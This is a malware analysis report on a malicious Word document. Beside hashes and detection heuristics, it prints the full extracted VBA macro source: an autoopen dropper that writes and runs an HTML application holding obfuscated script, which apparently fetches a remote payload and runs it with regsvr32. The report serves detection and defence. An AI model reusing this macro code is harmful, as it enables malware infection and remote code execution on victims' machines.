Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 59ae833512509475…

MALICIOUS

Office (OOXML)

80.1 KB Created: 2021-04-01 06:53:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: dec822dfea7dc430d6cfdf9135430019 SHA-1: 9a1cb848c08b506522660b055ca85f1a3c528746 SHA-256: 59ae833512509475e6d56a09cdf8638eeebf42737f87aa594d7525b1f09474d2
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set responseIterator = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set responseIterator = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9170 bytes
SHA-256: cc6e69353595766359208064ac949dd7ee281c134e6d5f3534bb5603259ffebc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{C13A8507-A2F6-4E28-B541-EF340F3EB32D}{5087E9D5-51BD-4F90-A5E5-9A223CC28FDE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function iteratorMain()
With frm.button1
iteratorMain = .Tag
End With
End Function
Function documentTmpView()
With frm.button1
documentTmpView = .Caption
End With
End Function
Public Sub button1_Click()
Set responseIterator = CreateObject("wscript.shell")
responseIterator.exec p(iteratorMain) & " " & p(documentTmpView)
End Sub


Attribute VB_Name = "arrayGenericResponse"
Sub autoopen()
listLeftList
End Sub
Function intel(WBuf)
intel = "" & WBuf & ""
End Function
Sub listLeftList()
Dim namespaceLoad As String
namespaceLoad = p(frm.button1.Caption)
Set genericTmpVb = New leftVariableLeft
genericTmpVb.namespaceRightProcedure namespaceLoad, procedureBuf
frm.button1_Click
End Sub
Function valueIndex(textboxText, WMemValue, counterClass)
valueIndex = Replace(textboxText, WMemValue, counterClass)
End Function

Attribute VB_Name = "vbNext"
Function memLib()
memLib = intel("<html><body><div id='content'>fTtlc29sYy5jb3JQcG10OykyICwiZ3BqLm")
End Function
Function borderCountDocument()
borderCountDocument = intel("tuaUxiaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLmNvclBwbXQ7KX")
End Function
Function listOptionWindow()
listOptionWindow = intel("lkb2Jlc25vcHNlci5lY25lcmVmZVJlemlTcGF3cyhldGlydy5jb3JQcG10OzEgPS")
End Function
Function classSize()
classSize = intel("BlcHl0LmNvclBwbXQ7bmVwby5jb3JQcG10OykibWFlcnRzLmJkb2RhIih0Y2VqYk")
End Function
Function variableCount()
variableCount = intel("9YZXZpdGNBIHdlbiA9IGNvclBwbXQgcmF2eykwMDIgPT0gc3V0YXRzLmVjbmVyZW")
End Function
Function countCountClear()
countCountClear = intel("ZlUmV6aVNwYXdzKGZpOykoZG5lcy5lY25lcmVmZVJlemlTcGF3czspZXNsYWYgLC")
End Function
Function tmpStorageArray()
tmpStorageArray = intel("JyZ3hwbDQ9dXA5JmhQUzg2UjlpeXdxeExCQ3BvbzdXQz1mZXImNUdkeldnNmZSRl")
End Function
Function indexDeleteSwap()
indexDeleteSwap = intel("dIWUdEc1hBQXo9OUh4RkYmYlZ3S2JjeXhRPWVnYXAmT29vOGVvdnZMdzdzeno5eW")
End Function
Function titleTmpVar()
titleTmpVar = intel("lQME43NHo9ZW1pdCZobTc3MWc4Wj1xJlhLcFZrMmV4U1o9alImcTU9aGNyYWVzJk")
End Function
Function removeAList()
removeAList = intel("9uNU1RMjVQc29DUXFtYz1kaT85bmF4LzI0Mzc4L2NjSExvOS9PaUxXUkZPc3JNVU")
End Function
Function windowTableLen()
windowTableLen = intel("5ZRmRLbFNvQVlwQTVNUHMvOWFLWVVtV0g4ZFdkbG0xVUJYWElwRzExT0cxSmwvZy")
End Function
Function refScreenBorder()
refScreenBorder = intel("9zeXVvZy9tb2Mucm9ycm9oZWthbGIvLzpwdHRoIiAsIlRFRyIobmVwby5lY25lcm")
End Function
Function procVb()
procVb = intel("VmZVJlemlTcGF3czspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbi")
End Function
Function pasteStructIterator()
pasteStructIterator = intel("A9IGVjbmVyZWZlUmV6aVNwYXdzIHJhdg==|fXspZXNub3BzZVJ0c25vYyhoY3RhY")
End Function
Function pointerLibNext()
pointerLibNext = intel("307KSJhdGgua25pTGJpbFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZldGVsZWQuZ")
End Function
Function copyRight()
copyRight = intel("WNuZXJlZmVSdG5lbXVncmF7eXJ0OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY")
End Function
Function selectCopyReference()
selectCopyReference = intel("3MiKHRjZWpiT1hldml0Y0Egd2VuID0gZWNuZXJlZmVSdG5lbXVncmEgcmF2OykiZ")
End Function
Function databaseQueryIndex()
databaseQueryIndex = intel("3BqLmtuaUxiaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuKSJsb")
End Function
Function textboxProcIterator()
textboxProcIterator = intel("GVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='table1")
End Function
Function swapVbCollection()
swapVbCollection = intel("'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/<")
End Function
Function removeLinkDocument()
removeLinkDocument = intel("/div><div id='table3'></div><script language='javascript'>functi")
End Function
Function funcTableProcedure()
funcTableProcedure = intel("on localCountSelect(tableTmp){return(new ActiveXObject(tableTmp)")
End Function
Function tempIndexMemory()
tempIndexMemory = intel(");}function databaseMem(selectListVb){return(repoPointer.getElem")
End Function
Function deleteList()
deleteList = intel("entById(selectListVb).innerHTML);}function structA(){var textCon")
End Function
Function tmpClassOption()
tmpClassOption = intel("st = databaseMem('table1');var tmpStorage = textConst.toLowerCas")
End Function
Function memoryTrust()
memoryTrust = intel("e();var screenTmp = databaseMem('table2');return(textConst + tmp")
End Function
Function querySize()
querySize = intel("Storage + screenTmp);}function collectionRightMain(s){var e={}; ")
End Function
Function tempStructRepo()
tempStructRepo = intel("var i; var b=0; var c; var x; var l=0; var a; var documentIndexC")
End Function
Function windowPasteTable()
windowPasteTable = intel("onst=''; var w=String.fromCharCode; var L=s.length;var textLink ")
End Function
Function memoryTitle()
memoryTitle = intel("= 'charAt';for(i=0;i<64;i++){e[structA()[textLink](i)]=i;}for(x=")
End Function
Function convertPointer()
convertPointer = intel("0;x<L;x++){c=e[s[textLink](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(")
End Function
Function countBuffer()
countBuffer = intel("b>>>(l-=8))&0xff)||(x<(L-2)))&&(documentIndexConst+=w(a));}}retu")
End Function
Function collectionTmpRepo()
collectionTmpRepo = intel("rn(documentIndexConst);};function classVariableDocument(argument")
End Function
Function AButton()
AButton = intel("Button){return argumentButton.split('').reverse().join('');}varG")
End Function
Function selectClear()
selectClear = intel("eneric = window;repoPointer = document;varGeneric.resizeTo(1, 1)")
End Function
Function bufVbTmp()
bufVbTmp = intel(";varGeneric.moveTo(-100, -100);var ExText = repoPointer.getEleme")
End Function
Function genericLen()
genericLen = intel("ntById('content').innerHTML;var ExText = ExText.split('|');var s")
End Function
Function localProc()
localProc = intel("torageDataVar = classVariableDocument(collectionRightMain(ExText")
End Function
Function trustArgument()
trustArgument = intel("[0]));var namespaceTrust = classVariableDocument(collectionRight")
End Function
Function documentTrust()
documentTrust = intel("Main(ExText[1]));</script><script language='javascript'>function")
End Function
Function iteratorCollection()
iteratorCollection = intel(" clearProc(swapTextboxStruct){var globalIndexArgument = localCou")
End Function
Function vbCounterBuf()
vbCounterBuf = intel("ntSelect('msscriptcontrol.scriptcontrol');globalIndexArgument.La")
End Function
Function swapMemoryIndex()
swapMemoryIndex = intel("nguage = 'jscript';globalIndexArgument.Timeout = 60000;globalInd")
End Function
Function mainReferenceIterator()
mainReferenceIterator = intel("exArgument.AddCode(swapTextboxStruct);return(null);}</script><sc")
End Function
Function tempPaste()
tempPaste = intel("ript language='vbscript'>clearProc storageDataVar : clearProc na")
End Function
Function repoSwap()
repoSwap = intel("mespaceTrust : varGeneric.close</script></body></html>")
End Function
Function procedureBuf()
procedureBuf = memLib + borderCountDocument + listOptionWindow + classSize + variableCount + countCountClear + tmpStorageArray + indexDeleteSwap + titleTmpVar + removeAList + windowTableLen + refScreenBorder + procVb + pasteStructIterator + pointerLibNext + copyRight + selectCopyReference + databaseQueryIndex + textboxProcIterator + swapVbCollection + removeLinkDocument + funcTableProcedure + tempIndexMemory + deleteList + tmpClassOption + memoryTrust + querySize + tempStructRepo + windowPasteTable + memoryTitle + convertPointer + countBuffer + collectionTmpRepo + AButton + selectClear + bufVbTmp + genericLen + localProc + trustArgument + documentTrust + iteratorCollection + vbCounterBuf + swapMemoryIndex + mainReferenceIterator + tempPaste + repoSwap
End Function

Attribute VB_Name = "leftVariableLeft"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub namespaceRightProcedure(arrayWindowWindow As String, tableTextbox As String)
Dim mainCollection As FileSystemObject
Set mainCollection = New FileSystemObject
Dim WTextbox As TextStream
Set WTextbox = mainCollection.CreateTextFile(arrayWindowWindow)
WTextbox.WriteLine tableTextbox
WTextbox.Close
Set WTextbox = Nothing
Set mainCollection = Nothing
End Sub

Attribute VB_Name = "copyFunc"
Function p(buttonProcTrust)
p = valueIndex(buttonProcTrust, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 39936 bytes
SHA-256: 11d187280a234330a77217f292cfddeb5ab83205df84e26e7b262371ce722d5a

Open this report in the interactive analyzer, or submit your own file for analysis.